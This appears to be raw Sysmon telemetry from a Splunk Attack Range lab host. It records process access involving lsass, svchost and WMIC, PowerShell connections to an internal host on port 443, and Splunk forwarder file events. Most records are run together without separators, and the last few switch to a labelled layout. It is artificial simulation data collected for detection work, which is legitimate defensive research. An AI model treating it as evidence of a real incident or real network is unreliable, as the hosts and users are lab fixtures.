18:15:59.528{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000035085515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:59.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BD5B67378D1AA9309D87422E8BB6143,SHA256=DF9E9EBB797D7972F19FB71D5B9EE71200C0B5EDEB5E84857EF538E1248212CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035085514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:23.372{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56738-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:00.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=312E1438CC1A63CAEAA8C3D1E87A3F08,SHA256=7A03246C95ACEAC670D4049B24FC29140DB55C3D28896528809CEFACACD71630,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:01.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D50207C1FE08183AB51F43EB9879337C,SHA256=626067E77AC55635810F1D54DC67B29FF8A3FD2E1A7D14386FE41FED28494EA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:25.554{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56739-false10.0.1.14WIN-DC-128445microsoft-ds 23542300x800000000000000035085520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:02.335{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=834DC582FB017DF75F2BD688115C3234,SHA256=CE14649CCD2DD2A4B44D60575779C17BDDB3DE8F39F4804413B17A12350EA2B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3BD719676C06345BC7CF611B1AB127FE,SHA256=3E141216DA1AE614231DCB7864BD7C6BB736CA04847341996B2958CCC94B713E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02AF874E6748E725EE3F0219E9E74922,SHA256=1BD668129A2EB9CF8AA5889DDDBD76ED5EF284F4A314AA85033657DB91A14E95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:27.234{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56740-false10.0.1.12-8000- 354300x800000000000000035085525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:28.375{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56741-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:04.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E37DF80304C145E5C7E9BEBC90EDF13,SHA256=EC22C7A01408F6581EB393C92379DBFC224A25BEF6C055D665713570B7DB2600,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:05.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38E90FBD2E5B66ADB68F97BC0242591,SHA256=90F0C45AE73EAAD590B523F38EB9F8ABB03C3E5FD66E38A79D9C553CB1920845,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:06.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81011C7087696568E1B92DB6AA6D45B2,SHA256=CEB2F13192DCB681DF7D9854178716949B72A280494CB4C7E8CCCF4A30467D42,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:07.444{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C5E6DDBD05A69A98645CDAE5B93BDF,SHA256=8C33D28E182BCED6E69B1D23F2360E46A318C73C8A79756D1D426C2B56FFEFE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:08.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332C64A601F47D1BD31ED14DD5835E50,SHA256=1D05FB312A7A1CCBC70B1E58F137BA6952344F2E9DE7877502D66D2EE84E306B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:08.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4FCBB8B0EB2B365F99F1C2C0A5A6E0A7,SHA256=72F0E2A716083E66E63EE07D0C301A9F69D7F7989754D4C468A834E37DD13D38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:09.497{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A1163DBF103B8288F686E1E7EEB273F,SHA256=A14629919EF20C1A3BB17541514A1677CCB1CDBE416B94D3B4F58A43F563FFCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.169{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56742-false10.0.1.12-8000- 23542300x800000000000000035085534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:10.512{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C316B792F9D729FE232F35E982F556,SHA256=CA75FAFE3CF5D26FDB5AB7CAB0A7E7618E82FCB8F32A554947EF4668685E2257,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.385{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56743-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:11.527{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EAE86D25B9EFB849C0D890DFB7232F7,SHA256=4902301037AA338EE5CD154ACF82A734CCBDD6697C422C51640ABD3BCBB91182,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:12.541{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEADE00947D51D9E1ADD58B399AA39C3,SHA256=FE407FFEF71C8AF02E3F495BEC28B44032A588FDBF6ADAFF03A88BA18007AA84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.694{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:13.678{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.674{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.578{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03502D50DC2F87496A3313CC487F1684,SHA256=F73375E579184EA434FC439CA1564A72FA79C1565A00A8E0BCBA3283267015FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.425{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:13.425{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.409{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
--- EventID 10 (ProcessAccess); the record header precedes this line
UtcTime: 2021-09-09 18:16:13.409
SourceProcessGUID: {B81B27B7-4012-611D-0B00-00000000C801}  SourceProcessId: 636  SourceThreadId: 5724
SourceImage: C:\Windows\system32\lsass.exe
TargetProcessGUID: {B81B27B7-4F6D-613A-6990-03000000C801}  TargetProcessId: 2812
TargetImage: C:\Windows\System32\Wbem\WMIC.exe
GrantedAccess: 0x1000
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085554, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.409
SourceProcessGUID: {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId: 732  SourceThreadId: 5640
SourceImage: C:\Windows\system32\svchost.exe
TargetProcessGUID: {B81B27B7-4F6D-613A-6990-03000000C801}  TargetProcessId: 2812
TargetImage: C:\Windows\System32\Wbem\WMIC.exe
GrantedAccess: 0x1000
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085553, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.394
SourceProcessGUID: {B81B27B7-9957-6127-D045-01000000C801}  SourceProcessId: 5312  SourceThreadId: 1524
SourceImage: C:\Windows\system32\conhost.exe
TargetProcessGUID: {B81B27B7-4F6D-613A-6990-03000000C801}  TargetProcessId: 2812
TargetImage: C:\Windows\System32\Wbem\WMIC.exe
GrantedAccess: 0x1fffff
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

--- EventID 10 (ProcessAccess), EventRecordID 35085552, Microsoft-Windows-Sysmon/Operational, win-host-987.attackrange.local (Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000)
RuleName: -
UtcTime: 2021-09-09 18:16:13.394
SourceProcessGUID: {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId: 732  SourceThreadId: 5640
SourceImage: C:\Windows\system32\svchost.exe
TargetProcessGUID: {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId: 1820
TargetImage: C:\Windows\sysmon64.exe
GrantedAccess: 0x1400
